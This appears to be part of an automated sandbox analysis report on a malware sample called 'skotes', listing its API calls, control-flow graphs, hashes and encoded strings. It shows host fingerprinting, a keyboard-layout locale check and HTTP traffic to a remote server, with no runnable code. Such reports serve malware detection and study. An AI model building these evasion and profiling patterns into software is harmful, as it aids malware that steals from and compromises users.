                    • Instruction Fuzzy Hash: F082D5709042889BEF14EF68C9497CE7FB1AF46308F50859EE805673C2D7795A88CBD6

                    Control-flow Graph

                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040EB51
                    • CreateDirectoryA.KERNELBASE(00000000), ref: 0040EC83
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040ED98
                    • CreateThread.KERNEL32(00000000,00000000,0040E500,00000000,00000000,00000000), ref: 0040F809
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesCreateFile$DirectoryThread
                    • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$H4q$L1F$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                    • API String ID: 3544085614-3998556978
                    • Opcode ID: a521fbbcd20131e87f5689a46f0e9373613f0a7f33a26bc55964b8857b6dc86d
                    • Instruction ID: 61599b495f3986900b3d5f42d0d31f1f7c1f451fd5ba627810d148a1899a7283
                    • Opcode Fuzzy Hash: a521fbbcd20131e87f5689a46f0e9373613f0a7f33a26bc55964b8857b6dc86d
                    • Instruction Fuzzy Hash: 9BF25E71A001449BEF18DB38CD897DD7B729F82304F1481AEE409A73D6DB7D9AC48B99
                    APIs
                      • Part of subcall function 004065E0: GetUserNameA.ADVAPI32(?,?), ref: 0040663A
                      • Part of subcall function 004065E0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00406680
                      • Part of subcall function 004065E0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 0040668D
                    • IsUserAnAdmin.SHELL32 ref: 00415117
                    • GetUserNameA.ADVAPI32(?,?), ref: 004151A7
                    • GetComputerNameExW.KERNEL32(00000002,?,?,?,?), ref: 0041520B
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,?), ref: 004153B7
                      • Part of subcall function 00417A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00417AF8
                      • Part of subcall function 00417A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00417B01
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Name$User$AccountAdminAuthorityCnd_destroy_in_situComputerFileIdentifierLookupModuleMtx_destroy_in_situ
                    • String ID: 2I0$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$KCWUOl==$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$p4q$p;q
                    • API String ID: 2186296352-4036729595
                    • Opcode ID: d0ad94509498918fff561da56a017b53fc9c3dc2d6e89598b501c5cf19925bac
                    • Instruction ID: 1d10f1410e092f9b71bd66b141e4927ff13a770163cf0c262429eb76f9f18c37
                    • Opcode Fuzzy Hash: d0ad94509498918fff561da56a017b53fc9c3dc2d6e89598b501c5cf19925bac
                    • Instruction Fuzzy Hash: 0BF21671A001548BEB29DB28CE897DDBB769F82304F5481DDD048A72C2EB799FC48F59

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 973 40be30-40be7c 974 40c281-40c2a6 call 4180c0 973->974 975 40be82-40be86 973->975 980 40c2d4-40c2ec 974->980 981 40c2a8-40c2b4 974->981 975->974 976 40be8c-40be90 975->976 976->974 978 40be96-40bf2a Sleep InternetOpenW InternetConnectA call 417a00 call 405c10 976->978 1008 40bf2c 978->1008 1009 40bf2e-40bf4a HttpOpenRequestA 978->1009 985 40c2f2-40c2fe 980->985 986 40c238-40c250 980->986 983 40c2b6-40c2c4 981->983 984 40c2ca-40c2d1 call 41d663 981->984 983->984 988 40c34f-40c354 call 436c6a 983->988 984->980 990 40c304-40c312 985->990 991 40c22e-40c235 call 41d663 985->991 992 40c323-40c33f call 41cff1 986->992 993 40c256-40c262 986->993 990->988 998 40c314 990->998 991->986 999 40c268-40c276 993->999 1000 40c319-40c320 call 41d663 993->1000 998->991 999->988 1006 40c27c 999->1006 1000->992 1006->1000 1008->1009 1010 40bf7b-40bfea call 417a00 call 405c10 call 417a00 call 405c10 1009->1010 1011 40bf4c-40bf5b 1009->1011 1025 40bfec 1010->1025 1026 40bfee-40c004 HttpSendRequestA 1010->1026 1013 40bf71-40bf78 call 41d663 1011->1013 1014 40bf5d-40bf6b 1011->1014 1013->1010 1014->1013 1025->1026 1027 40c035-40c05d 1026->1027 1028 40c006-40c015 1026->1028 1031 40c08e-40c0af InternetReadFile 1027->1031 1032 40c05f-40c06e 1027->1032 1029 40c017-40c025 1028->1029 1030 40c02b-40c032 call 41d663 1028->1030 1029->1030 1030->1027 1036 40c0b5 1031->1036 1034 40c070-40c07e 1032->1034 1035 40c084-40c08b call 41d663 1032->1035 1034->1035 1035->1031 1039 40c0c0-40c170 call 434250 InternetReadFile 1036->1039
                    APIs
                    • Sleep.KERNELBASE(000005DC,708790F9,?,00000000), ref: 0040BEB8
                    • InternetOpenW.WININET(00458DC8,00000000,00000000,00000000,00000000), ref: 0040BEC7
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEEB
                    • HttpOpenRequestA.WININET(?,00000000), ref: 0040BF35
                    • HttpSendRequestA.WININET(?,00000000), ref: 0040BFF5
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0040C0A7
                    • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040C160
                    • InternetCloseHandle.WININET(?), ref: 0040C187
                    • InternetCloseHandle.WININET(?), ref: 0040C18F
                    • InternetCloseHandle.WININET(?), ref: 0040C197
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                    • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                    • API String ID: 1439999335-885246636
                    • Opcode ID: 1427ac73b846b57d83f712b19f3c9b795b27e0c63bcdc63216294c063ef4b5d9
                    • Instruction ID: 66a695ebc86e665ea6ba1adc167e16cc6fb7ba887d0da437c53a8f917e93c7b1
                    • Opcode Fuzzy Hash: 1427ac73b846b57d83f712b19f3c9b795b27e0c63bcdc63216294c063ef4b5d9
                    • Instruction Fuzzy Hash: EAB1B2B0A10118DBDB24CF28CC88B9E7B75EF45304F5042AEF909A72D1D7789AC4CB99

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1048 407d30-407db2 call 4340f0 GetVersionExW 1051 408356-408373 call 41cff1 1048->1051 1052 407db8-407de0 call 417a00 call 405c10 1048->1052 1059 407de2 1052->1059 1060 407de4-407e06 call 417a00 call 405c10 1052->1060 1059->1060 1065 407e08 1060->1065 1066 407e0a-407e23 GetModuleHandleA GetProcAddress 1060->1066 1065->1066 1067 407e54-407e7f 1066->1067 1068 407e25-407e34 1066->1068 1071 407eb0-407ed1 1067->1071 1072 407e81-407e90 1067->1072 1069 407e36-407e44 1068->1069 1070 407e4a-407e51 call 41d663 1068->1070 1069->1070 1073 408374 call 436c6a 1069->1073 1070->1067 1077 407ed3-407ed5 GetNativeSystemInfo 1071->1077 1078 407ed7 GetSystemInfo 1071->1078 1075 407e92-407ea0 1072->1075 1076 407ea6-407ead call 41d663 1072->1076 1085 408379-40837f call 436c6a 1073->1085 1075->1073 1075->1076 1076->1071 1082 407edd-407ee6 1077->1082 1078->1082 1083 407f04-407f07 1082->1083 1084 407ee8-407eef 1082->1084 1089 4082f7-4082fa 1083->1089 1090 407f0d-407f16 1083->1090 1087 408351 1084->1087 1088 407ef5-407eff 1084->1088 1087->1051 1092 40834c 1088->1092 1089->1087 1095 4082fc-408305 1089->1095 1093 407f18-407f24 1090->1093 1094 407f29-407f2c 1090->1094 1092->1087 1093->1092 1097 407f32-407f39 1094->1097 1098 4082d4-4082d6 1094->1098 1099 408307-40830b 1095->1099 1100 40832c-40832f 1095->1100 1103 408019-4082bd call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 call 417a00 call 405c10 call 405730 1097->1103 1104 407f3f-407f9b call 417a00 call 405c10 call 417a00 call 405c10 call 405d50 1097->1104 1101 4082e4-4082e7 1098->1101 1102 4082d8-4082e2 1098->1102 1105 408320-40832a 1099->1105 1106 40830d-408312 1099->1106 1107 408331-40833b 1100->1107 1108 40833d-408349 1100->1108 1101->1087 1109 4082e9-4082f5 1101->1109 1102->1092 1143 4082c3-4082cc 1103->1143 1129 407fa0-407fa7 1104->1129 1105->1087 1106->1105 1111 408314-40831e 1106->1111 1107->1087 1108->1092 1109->1092 1111->1087 1131 407fa9 1129->1131 1132 407fab-407fcb call 438bbe 1129->1132 1131->1132 1138 408002-408004 1132->1138 1139 407fcd-407fdc 1132->1139 1138->1143 1144 40800a-408014 1138->1144 1141 407ff2-407fff call 41d663 1139->1141 1142 407fde-407fec 1139->1142 1141->1138 1142->1085 1142->1141 1143->1089 1148 4082ce 1143->1148 1144->1143 1148->1098
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,708790F9), ref: 00407DAA
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407E0B
                    • GetProcAddress.KERNEL32(00000000), ref: 00407E12
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED3
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407ED7
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                    • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$X3q$`p
                    • API String ID: 374719553-878134974
                    • Opcode ID: b4e34bd88424f385986ccb2c1884bf1b94988266c29017f5ac825074d378a784
                    • Instruction ID: d767b28cf4d1304312a0b4bfeaf627bf696c138522586543ff54ff165ce39ac5
                    • Opcode Fuzzy Hash: b4e34bd88424f385986ccb2c1884bf1b94988266c29017f5ac825074d378a784
                    • Instruction Fuzzy Hash: B4E10A70E00654A7DB14BB28CD0B39E7671AB82714F5442AEE815773C2DB7D4E858BCB

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1198 405ee0-405fde RegOpenKeyExA RegCloseKey 1202 405fe0-405fec 1198->1202 1203 406008-406015 call 41cff1 1198->1203 1204 405ffe-406005 call 41d663 1202->1204 1205 405fee-405ffc 1202->1205 1204->1203 1205->1204 1207 406016-40619d call 436c6a call 41e150 call 4180c0 * 5 RegOpenKeyExA 1205->1207 1226 4064b1-4064ba 1207->1226 1227 4061a3-406233 call 4340f0 RegQueryInfoKeyW 1207->1227 1229 4064e7-4064f0 1226->1229 1230 4064bc-4064c7 1226->1230 1238 406239-40623d 1227->1238 1239 40649f-4064ab RegCloseKey 1227->1239 1234 4064f2-4064fd 1229->1234 1235 40651d-406526 1229->1235 1232 4064c9-4064d7 1230->1232 1233 4064dd-4064e4 call 41d663 1230->1233 1232->1233 1240 4065d7-4065df call 436c6a 1232->1240 1233->1229 1242 406513-40651a call 41d663 1234->1242 1243 4064ff-40650d 1234->1243 1236 406553-40655c 1235->1236 1237 406528-406533 1235->1237 1249 406585-40658e 1236->1249 1250 40655e-406569 1236->1250 1244 406535-406543 1237->1244 1245 406549-406550 call 41d663 1237->1245 1246 406243-406279 RegEnumValueA 1238->1246 1247 406499 1238->1247 1239->1226 1242->1235 1243->1240 1243->1242 1244->1240 1244->1245 1245->1236 1254 406486-40648d 1246->1254 1255 40627f-40629e 1246->1255 1247->1239 1259 406590-40659f 1249->1259 1260 4065bb-4065d6 call 41cff1 1249->1260 1257 40657b-406582 call 41d663 1250->1257 1258 40656b-406579 1250->1258 1254->1246 1262 406493 1254->1262 1265 4062a0-4062a5 1255->1265 1257->1249 1258->1240 1258->1257 1267 4065b1-4065b8 call 41d663 1259->1267 1268 4065a1-4065af 1259->1268 1262->1247 1265->1265 1270 4062a7-4062fb call 4180c0 call 417a00 * 2 call 405d50 1265->1270 1267->1260 1268->1240 1268->1267 1270->1254
                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,000F003F,00000001), ref: 00405F13
                    • RegCloseKey.ADVAPI32(80000001), ref: 00405F4A
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpen
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 47109696-3963862150
                    • Opcode ID: c0022d9b75f536e3f42cf04b95f6f16c0f3d5fbfa78b103d563490b1c6eaaf2d
                    • Instruction ID: 3e75f403df9a9ad162f6256be2dff185f15a5583bc7f4b7e98941bc5bb1d550f
                    • Opcode Fuzzy Hash: c0022d9b75f536e3f42cf04b95f6f16c0f3d5fbfa78b103d563490b1c6eaaf2d
                    • Instruction Fuzzy Hash: 29D1A071900258ABDB24DF14CC85BDEB7B9EF05304F5042EAE509E72D1DB789AE88F58

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1360 441abc-441aec call 44180a 1363 441b07-441b13 call 43bf3a 1360->1363 1364 441aee-441af9 call 4375e3 1360->1364 1369 441b15-441b2a call 4375e3 call 4375f6 1363->1369 1370 441b2c-441b75 call 441775 1363->1370 1371 441afb-441b02 call 4375f6 1364->1371 1369->1371 1379 441b77-441b80 1370->1379 1380 441be2-441beb GetFileType 1370->1380 1381 441de1-441de5 1371->1381 1385 441bb7-441bdd GetLastError call 4375c0 1379->1385 1386 441b82-441b86 1379->1386 1382 441c34-441c37 1380->1382 1383 441bed-441c1e GetLastError call 4375c0 CloseHandle 1380->1383 1388 441c40-441c46 1382->1388 1389 441c39-441c3e 1382->1389 1383->1371 1397 441c24-441c2f call 4375f6 1383->1397 1385->1371 1386->1385 1390 441b88-441bb5 call 441775 1386->1390 1394 441c4a-441c98 call 43be85 1388->1394 1395 441c48 1388->1395 1389->1394 1390->1380 1390->1385 1403 441cb7-441cdf call 441522 1394->1403 1404 441c9a-441ca6 call 441984 1394->1404 1395->1394 1397->1371 1410 441ce4-441d25 1403->1410 1411 441ce1-441ce2 1403->1411 1404->1403 1409 441ca8 1404->1409 1412 441caa-441cb2 call 43af48 1409->1412 1413 441d46-441d54 1410->1413 1414 441d27-441d2b 1410->1414 1411->1412 1412->1381 1417 441ddf 1413->1417 1418 441d5a-441d5e 1413->1418 1414->1413 1416 441d2d-441d41 1414->1416 1416->1413 1417->1381 1418->1417 1420 441d60-441d93 CloseHandle call 441775 1418->1420 1423 441d95-441dc1 GetLastError call 4375c0 call 43c04d 1420->1423 1424 441dc7-441ddb 1420->1424 1423->1424 1424->1417
                    APIs
                      • Part of subcall function 00441775: CreateFileW.KERNELBASE(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792
                    • GetLastError.KERNEL32 ref: 00441BD0
                    • __dosmaperr.LIBCMT ref: 00441BD7
                    • GetFileType.KERNELBASE(00000000), ref: 00441BE3
                    • GetLastError.KERNEL32 ref: 00441BED
                    • __dosmaperr.LIBCMT ref: 00441BF6
                    • CloseHandle.KERNEL32(00000000), ref: 00441C16
                    • CloseHandle.KERNEL32(0043AC92), ref: 00441D63
                    • GetLastError.KERNEL32 ref: 00441D95
                    • __dosmaperr.LIBCMT ref: 00441D9C
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: 7ca2874191f465d34c79337ae684450c2280b7d624904165f7af79825262e3a6
                    • Instruction ID: 908140145710097c147751781d0df85f7731599b948b663735adbecd062618f5
                    • Opcode Fuzzy Hash: 7ca2874191f465d34c79337ae684450c2280b7d624904165f7af79825262e3a6
                    • Instruction Fuzzy Hash: 20A13972A041489FDF19DF68DC91BAE3BB1EB0A324F14015EE811EB3E1D7389942CB59

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1714 442517-44253f call 442133 call 442191 1719 4426e5-44271a call 436c87 call 442133 call 442191 1714->1719 1720 442545-442551 call 442139 1714->1720 1745 442720-44272c call 442139 1719->1745 1746 442842-44289e call 436c87 call 4462ee 1719->1746 1720->1719 1725 442557-442562 1720->1725 1727 442564-442566 1725->1727 1728 442598-4425a1 call 43adf5 1725->1728 1730 442568-44256c 1727->1730 1741 4425a4-4425a9 1728->1741 1733 44256e-442570 1730->1733 1734 442588-44258a 1730->1734 1737 442584-442586 1733->1737 1738 442572-442578 1733->1738 1739 44258d-44258f 1734->1739 1737->1739 1738->1734 1742 44257a-442582 1738->1742 1743 442595 1739->1743 1744 4426e1-4426e4 1739->1744 1741->1741 1747 4425ab-4425cc call 43b04b call 43adf5 1741->1747 1742->1730 1742->1737 1743->1728 1745->1746 1756 442732-44273e call 442165 1745->1756 1764 4428a0-4428a6 1746->1764 1765 4428a8-4428ab 1746->1765 1747->1744 1761 4425d2-4425d5 1747->1761 1756->1746 1763 442744-442765 call 43adf5 GetTimeZoneInformation 1756->1763 1766 4425d8-4425dd 1761->1766 1776 442820-442841 call 44212d call 442121 call 442127 1763->1776 1777 44276b-44278c 1763->1777 1769 4428ee-442900 1764->1769 1768 4428ad-4428bd call 43b04b 1765->1768 1765->1769 1766->1766 1770 4425df-4425f1 call 43a1f1 1766->1770 1785 4428c7-4428e0 call 4462ee 1768->1785 1786 4428bf 1768->1786 1773 442910 1769->1773 1774 442902-442905 1769->1774 1770->1719 1789 4425f7-44260a call 444b17 1770->1789 1779 442915-44292a call 43adf5 call 41cff1 1773->1779 1780 442910 call 4426f2 1773->1780 1774->1773 1781 442907-44290e call 442517 1774->1781 1783 442796-44279d 1777->1783 1784 44278e-442793 1777->1784 1780->1779 1781->1779 1791 4427af-4427b1 1783->1791 1792 44279f-4427a6 1783->1792 1784->1783 1809 4428e5-4428eb call 43adf5 1785->1809 1810 4428e2-4428e3 1785->1810 1793 4428c0-4428c5 call 43adf5 1786->1793 1789->1719 1811 442610-442613 1789->1811 1801 4427b3-4427dc call 43ef17 call 43e926 1791->1801 1792->1791 1799 4427a8-4427ad 1792->1799 1813 4428ed 1793->1813 1799->1801 1827 4427de-4427e1 1801->1827 1828 4427ea-4427ec 1801->1828 1809->1813 1810->1793 1816 442615-442619 1811->1816 1817 44261b-442621 1811->1817 1813->1769 1816->1811 1816->1817 1821 442624-442631 call 438bbe 1817->1821 1822 442623 1817->1822 1830 442634-442639 1821->1830 1822->1821 1827->1828 1831 4427e3-4427e8 1827->1831 1829 4427ee-44280c call 43e926 1828->1829 1837 44280e-442811 1829->1837 1838 44281b-44281e 1829->1838 1833 442642-442643 1830->1833 1834 44263b-442640 1830->1834 1831->1829 1833->1830 1834->1833 1836 442645-442648 1834->1836 1839 442696-442699 1836->1839 1840 44264a-442661 call 438bbe 1836->1840 1837->1838 1841 442813-442819 1837->1841 1838->1776 1842 4426a0-4426b4 1839->1842 1843 44269b-44269d 1839->1843 1849 442675-442677 1840->1849 1850 442663 1840->1850 1841->1776 1845 4426b6-4426c6 call 444b17 1842->1845 1846 4426ca 1842->1846 1843->1842 1845->1719 1856 4426c8 1845->1856 1851 4426cd-4426df call 44212d call 442121 1846->1851 1849->1839 1855 442679-442689 call 438bbe 1849->1855 1853 442665-44266a 1850->1853 1851->1744 1853->1849 1857 44266c-442673 1853->1857 1863 442690-442694 1855->1863 1856->1851 1857->1849 1857->1853 1863->1839 1864 44268b-44268d 1863->1864 1864->1839 1865 44268f 1864->1865 1865->1863
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: Eastern Standard Time$Eastern Summer Time$XgE
                    • API String ID: 597776487-3532857169
                    • Opcode ID: d856579218538fd04bbb565ecd9691cbd98b5e949d232d9bad808dfef98568af
                    • Instruction ID: df7d7efe0813b1fc9665f027b9df2e4c66d539f3229410abaef311319f10ac1b
                    • Opcode Fuzzy Hash: d856579218538fd04bbb565ecd9691cbd98b5e949d232d9bad808dfef98568af
                    • Instruction Fuzzy Hash: 4AC14B71900205ABFB10AF69CE517AFBBA9EF45354F9500AFF88097391E7B88E41C758

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1866 4065e0-4066b8 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority call 417a00 call 405c10 1871 4066ba 1866->1871 1872 4066bc-4066db call 4022c0 1866->1872 1871->1872 1875 40670c-406712 1872->1875 1876 4066dd-4066ec 1872->1876 1879 406715-40671a 1875->1879 1877 406702-406709 call 41d663 1876->1877 1878 4066ee-4066fc 1876->1878 1877->1875 1878->1877 1880 406937 call 436c6a 1878->1880 1879->1879 1882 40671c-406744 call 417a00 call 405c10 1879->1882 1886 40693c call 436c6a 1880->1886 1893 406746 1882->1893 1894 406748-406769 call 4022c0 1882->1894 1890 406941-406946 call 436c6a 1886->1890 1893->1894 1898 40679a-4067ae GetSidSubAuthorityCount 1894->1898 1899 40676b-40677a 1894->1899 1902 4067b4-4067ba 1898->1902 1903 406858-40687c 1898->1903 1900 406790-406797 call 41d663 1899->1900 1901 40677c-40678a 1899->1901 1900->1898 1901->1886 1901->1900 1905 4067c0-4067ed GetSidSubAuthority call 417a00 call 405c10 1902->1905 1906 406880-406885 1903->1906 1916 4067f1-406818 call 4022c0 1905->1916 1917 4067ef 1905->1917 1906->1906 1909 406887-4068ec call 4180c0 * 2 1906->1909 1920 406919-406936 call 41cff1 1909->1920 1921 4068ee-4068fd 1909->1921 1926 406849-40684c 1916->1926 1927 40681a-406829 1916->1927 1917->1916 1923 40690f-406916 call 41d663 1921->1923 1924 4068ff-40690d 1921->1924 1923->1920 1924->1890 1924->1923 1926->1905 1933 406852 1926->1933 1930 40682b-406839 1927->1930 1931 40683f-406846 call 41d663 1927->1931 1930->1880 1930->1931 1931->1926 1933->1903
                    APIs
                    • GetUserNameA.ADVAPI32(?,?), ref: 0040663A
                    • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00406680
                    • GetSidIdentifierAuthority.ADVAPI32(?), ref: 0040668D
                    • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004067A1
                    • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 004067C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Authority$Name$AccountCountIdentifierLookupUser
                    • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                    • API String ID: 4230999276-2309319047
                    • Opcode ID: 5b9cb0ec596235d55a0374935ea4ba4a3dc15d7e65b7ab62b683b660989a08c7
                    • Instruction ID: fce242e848c23d48bc2af3d62d8903954cced83d6e4b57403525f3fbbb18cdf3
                    • Opcode Fuzzy Hash: 5b9cb0ec596235d55a0374935ea4ba4a3dc15d7e65b7ab62b683b660989a08c7
                    • Instruction Fuzzy Hash: 1991C5B19001189BDB28DF68CC85BDDB779EB45304F5045FEE509A7282DB749BC48F68

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1936 40b9f0-40ba5f call 418510 CoInitialize 1939 40ba61-40ba7b CoCreateInstance 1936->1939 1940 40ba87 1936->1940 1941 40ba81 CoUninitialize 1939->1941 1942 40bb07-40bb21 1939->1942 1943 40ba89-40ba8f 1940->1943 1941->1940 1942->1940 1956 40bb27-40bb2c 1942->1956 1944 40ba91-40baa3 1943->1944 1945 40bac3-40badd 1943->1945 1946 40baa5-40bab3 1944->1946 1947 40bab9-40bac0 call 41d663 1944->1947 1948 40bae3-40baef 1945->1948 1949 40bb6e-40bb89 call 41cff1 1945->1949 1946->1947 1951 40bb8a-40bb8f call 436c6a 1946->1951 1947->1945 1953 40baf1-40baff 1948->1953 1954 40bb64-40bb6b call 41d663 1948->1954 1953->1951 1959 40bb05 1953->1959 1954->1949 1956->1940 1962 40bb32-40bb3e 1956->1962 1959->1954 1966 40bb40-40bb4f CoUninitialize 1962->1966 1967 40bb54-40bb5f CoUninitialize 1962->1967 1966->1940 1967->1943
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040BA57
                    • CoCreateInstance.COMBASE(00458F80,00000000,00000001,00458F90,?), ref: 0040BA73
                    • CoUninitialize.COMBASE ref: 0040BA81
                    • CoUninitialize.COMBASE ref: 0040BB40
                    • CoUninitialize.COMBASE ref: 0040BB54
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Uninitialize$CreateInitializeInstance
                    • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==
                    • API String ID: 1968832861-3795060574
                    • Opcode ID: b12c53546586ca1363a4f126f5e0369a2efa9c5f3e076ebad6d92b548045a957
                    • Instruction ID: aa5973b7119725b2c9a958bba5187bd3a29cec50dc0543cd5e4a1e68f5f3e6b5
                    • Opcode Fuzzy Hash: b12c53546586ca1363a4f126f5e0369a2efa9c5f3e076ebad6d92b548045a957
                    • Instruction Fuzzy Hash: 82416171B00204AFDB04CF68CC89BAE77B5EB48715F10812AF805E76D5DB78A944CB99

                    Control-flow Graph

                    • Executed
                    • Not Executed
